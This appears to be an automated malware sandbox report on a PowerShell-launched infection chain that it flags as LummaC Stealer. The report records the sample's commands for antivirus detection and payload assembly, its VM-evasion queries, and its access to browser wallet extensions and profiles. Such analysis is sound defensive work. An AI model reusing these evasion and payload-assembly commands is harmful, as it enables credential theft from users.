Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll	Jump to behavior

Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe

Code function: 3_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,

3_2_004062FC

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 0_2_00007FFE7DF200BD pushad ; iretd

0_2_00007FFE7DF200C1

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\701961\Puts.com

Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\701961\Puts.com			Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Uses an obfuscated file name to hide its real file extension (double extension)

Source: Possible double extension: txt.ps1

Static PE information: pennicle.txt.ps1

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected ZipBomb

Source: Yara match

File source: C:\Users\user\AppData\Roaming\pkg3.zip, type: DROPPED

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3774			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6105			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7996	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8008	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com TID: 5764	Thread sleep time: -120000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Code function: 3_2_004062D5 FindFirstFileW,FindClose,	3_2_004062D5
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Code function: 3_2_00402E18 FindFirstFileW,	3_2_00402E18
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Code function: 3_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	3_2_00406C9B

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Source: powershell.exe, 00000000.00000002.1482037144.000001D5FA3AC000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe

Code function: 3_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,

3_2_004062FC

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe "C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Battle Battle.cmd & Battle.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 701961	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "CigaretteSmallPlatesCalgary" Tits	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Relationship + ..\Playing + ..\Closely + ..\Reducing + ..\Inventory + ..\Kingdom + ..\Suppose j	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\701961\Puts.com Puts.com j	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior

Source: SolPen.exe, 00000003.00000003.1408125240.000000000287C000.00000004.00000020.00020000.00000000.sdmp, Puts.com, 0000000D.00000000.1446492222.0000000000243000.00000002.00000001.01000000.0000000A.sdmp, Solution.3.dr, Puts.com.4.dr

Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe

Code function: 3_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

3_2_00406805

Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\prefs.js	Jump to behavior
